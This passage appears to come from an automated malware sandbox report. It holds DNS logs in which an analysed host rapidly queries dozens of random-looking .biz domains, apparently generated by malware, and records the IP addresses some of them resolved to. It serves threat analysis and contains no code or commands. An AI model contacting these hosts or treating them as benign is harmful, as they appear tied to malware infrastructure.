                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.688134909 CET6193053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.695607901 CET53619301.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.097012997 CET53516171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.950757980 CET6266753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.958441973 CET53626671.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.633313894 CET5198053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.640697002 CET53519801.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.041965961 CET5822753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.050741911 CET53582271.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.051306963 CET5716553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.058545113 CET53571651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.083432913 CET5716553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.090626955 CET53571651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.619079113 CET5826653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.626684904 CET53582661.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.627181053 CET5272753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.635644913 CET53527271.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.636077881 CET6438953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.644619942 CET53643891.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.575613022 CET192.168.2.71.1.1.10x84a2Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.837444067 CET192.168.2.71.1.1.10x39fdStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.408471107 CET192.168.2.71.1.1.10xac9Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.627800941 CET192.168.2.71.1.1.10x8884Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.265758038 CET192.168.2.71.1.1.10x968cStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.185914993 CET192.168.2.71.1.1.10x5cb7Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.207046986 CET192.168.2.71.1.1.10x32a5Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.512634039 CET192.168.2.71.1.1.10xf755Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.387227058 CET192.168.2.71.1.1.10xfd74Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.051191092 CET192.168.2.71.1.1.10xfdc3Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.872971058 CET192.168.2.71.1.1.10xb9a2Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.887140989 CET192.168.2.71.1.1.10x448bStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:53.000797987 CET192.168.2.71.1.1.10x2c8dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:54.877201080 CET192.168.2.71.1.1.10xc556Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.152791023 CET192.168.2.71.1.1.10x5bc5Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.383336067 CET192.168.2.71.1.1.10x8a91Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.460771084 CET192.168.2.71.1.1.10x92ccStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.412425041 CET192.168.2.71.1.1.10xd97eStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.101104975 CET192.168.2.71.1.1.10x66d4Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.109232903 CET192.168.2.71.1.1.10xa1d1Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.219620943 CET192.168.2.71.1.1.10x6d0eStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.119179964 CET192.168.2.71.1.1.10x87e5Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.774971962 CET192.168.2.71.1.1.10x42e0Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.049647093 CET192.168.2.71.1.1.10x354Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.504407883 CET192.168.2.71.1.1.10x3597Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.569612980 CET192.168.2.71.1.1.10x9824Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.585613966 CET192.168.2.71.1.1.10x33a8Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.062659025 CET192.168.2.71.1.1.10xf3eStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.425374031 CET192.168.2.71.1.1.10x74deStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.903654099 CET192.168.2.71.1.1.10x14b3Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.478897095 CET192.168.2.71.1.1.10x7cadStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.595942974 CET192.168.2.71.1.1.10x6a45Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.851342916 CET192.168.2.71.1.1.10x8c3bStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.014448881 CET192.168.2.71.1.1.10x331fStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.827534914 CET192.168.2.71.1.1.10x3a4fStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.843076944 CET192.168.2.71.1.1.10x3607Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.581321001 CET192.168.2.71.1.1.10xe211Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.043354034 CET192.168.2.71.1.1.10x3e30Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.385135889 CET192.168.2.71.1.1.10x5e72Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.154613972 CET192.168.2.71.1.1.10x3ec0Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.838269949 CET192.168.2.71.1.1.10x3af1Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.529572010 CET192.168.2.71.1.1.10xfde3Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.729672909 CET192.168.2.71.1.1.10x9366Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402751923 CET192.168.2.71.1.1.10x7a25Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.269606113 CET192.168.2.71.1.1.10x5042Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.448548079 CET192.168.2.71.1.1.10xe9d9Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.277753115 CET192.168.2.71.1.1.10x5042Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.596405029 CET192.168.2.71.1.1.10x3fe9Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.638175964 CET192.168.2.71.1.1.10xde67Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.528462887 CET192.168.2.71.1.1.10x1c66Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.550672054 CET192.168.2.71.1.1.10xe84bStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.387950897 CET192.168.2.71.1.1.10xf8e5Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:04.061347961 CET192.168.2.71.1.1.10x7d75Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.202946901 CET192.168.2.71.1.1.10xebc7Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.592974901 CET192.168.2.71.1.1.10x1f14Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.904050112 CET192.168.2.71.1.1.10x2ecStandard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.098073006 CET192.168.2.71.1.1.10xa2f0Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.817307949 CET192.168.2.71.1.1.10x4ff7Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.421506882 CET192.168.2.71.1.1.10x22b7Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:07.667074919 CET192.168.2.71.1.1.10xec25Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.367508888 CET192.168.2.71.1.1.10x9055Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:08.586687088 CET192.168.2.71.1.1.10x6dbcStandard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.270189047 CET192.168.2.71.1.1.10x618Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:09.372019053 CET192.168.2.71.1.1.10x9d14Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.158437967 CET192.168.2.71.1.1.10xc56aStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:10.239902973 CET192.168.2.71.1.1.10x6664Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.029144049 CET192.168.2.71.1.1.10x99cbStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.085146904 CET192.168.2.71.1.1.10x321bStandard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:11.941771030 CET192.168.2.71.1.1.10x45c2Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.634742022 CET192.168.2.71.1.1.10x2757Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:12.740525007 CET192.168.2.71.1.1.10x8e44Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.322921038 CET192.168.2.71.1.1.10x6ea1Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.334281921 CET192.168.2.71.1.1.10x4723Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:13.596249104 CET192.168.2.71.1.1.10x2a62Standard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.758394003 CET192.168.2.71.1.1.10x9a88Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.099328995 CET192.168.2.71.1.1.10x7cf1Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.465641975 CET192.168.2.71.1.1.10xc779Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.934812069 CET192.168.2.71.1.1.10x2bdcStandard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.169683933 CET192.168.2.71.1.1.10x6becStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.857629061 CET192.168.2.71.1.1.10x66d7Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.880137920 CET192.168.2.71.1.1.10x66d7Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.126230955 CET192.168.2.71.1.1.10xfd9fStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.146985054 CET192.168.2.71.1.1.10xfd9fStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.839443922 CET192.168.2.71.1.1.10xdb49Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.584146976 CET192.168.2.71.1.1.10xff2aStandard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.608921051 CET192.168.2.71.1.1.10xb7adStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.445046902 CET192.168.2.71.1.1.10xc6a7Standard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.136277914 CET192.168.2.71.1.1.10xf26Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.215051889 CET192.168.2.71.1.1.10x28eStandard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.247294903 CET192.168.2.71.1.1.10x28eStandard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.011148930 CET192.168.2.71.1.1.10x251bStandard query (0)hlzfuyy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.839175940 CET192.168.2.71.1.1.10xf2ebStandard query (0)nwdnxrd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.883306026 CET192.168.2.71.1.1.10x13edStandard query (0)rffxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.694978952 CET192.168.2.71.1.1.10x6491Standard query (0)ereplfx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.892904997 CET192.168.2.71.1.1.10x9be0Standard query (0)cikivjto.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.556070089 CET192.168.2.71.1.1.10x3bceStandard query (0)ptrim.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:24.758970976 CET192.168.2.71.1.1.10xc094Standard query (0)qncdaagct.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.051883936 CET192.168.2.71.1.1.10x7644Standard query (0)znwbniskf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:26.245014906 CET192.168.2.71.1.1.10x4b40Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.550003052 CET192.168.2.71.1.1.10x17c2Standard query (0)cpclnad.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:27.702708006 CET192.168.2.71.1.1.10xd98eStandard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.398457050 CET192.168.2.71.1.1.10xbde7Standard query (0)mjheo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:28.399523020 CET192.168.2.71.1.1.10x53eStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:29.087512016 CET192.168.2.71.1.1.10xbe96Standard query (0)wluwplyh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.256401062 CET192.168.2.71.1.1.10xc6adStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.834011078 CET192.168.2.71.1.1.10x3418Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.694418907 CET192.168.2.71.1.1.10xa6e2Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.725127935 CET192.168.2.71.1.1.10x828fStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.731010914 CET192.168.2.71.1.1.10xa774Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.732795954 CET192.168.2.71.1.1.10x27aeStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.589370966 CET192.168.2.71.1.1.10xeeaeStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.227632046 CET192.168.2.71.1.1.10x79bdStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.236211061 CET192.168.2.71.1.1.10xc74dStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:05.245189905 CET192.168.2.71.1.1.10x7e9eStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.090101004 CET192.168.2.71.1.1.10xa513Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.950757980 CET192.168.2.71.1.1.10xf7bfStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.633313894 CET192.168.2.71.1.1.10xb136Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.041965961 CET192.168.2.71.1.1.10xf1caStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.051306963 CET192.168.2.71.1.1.10x8f44Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.083432913 CET192.168.2.71.1.1.10x8f44Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.619079113 CET192.168.2.71.1.1.10xae01Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.627181053 CET192.168.2.71.1.1.10x539aStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.636077881 CET192.168.2.71.1.1.10x41Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.239085913 CET1.1.1.1192.168.2.70x5504No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.754686117 CET1.1.1.1192.168.2.70x4e59No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.040740013 CET1.1.1.1192.168.2.70x795bName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.049161911 CET1.1.1.1192.168.2.70x63daName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.057276964 CET1.1.1.1192.168.2.70x2103No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.545430899 CET1.1.1.1192.168.2.70x6f18No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.314340115 CET1.1.1.1192.168.2.70xda58No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.176382065 CET1.1.1.1192.168.2.70x7ce3No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.850183964 CET1.1.1.1192.168.2.70x1daeNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.850183964 CET1.1.1.1192.168.2.70x1daeNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.583297014 CET1.1.1.1192.168.2.70x84a2No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.857367039 CET1.1.1.1192.168.2.70x39fdNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.416353941 CET1.1.1.1192.168.2.70xac9No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.635176897 CET1.1.1.1192.168.2.70x8884No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.272682905 CET1.1.1.1192.168.2.70x968cNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.193126917 CET1.1.1.1192.168.2.70x5cb7No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
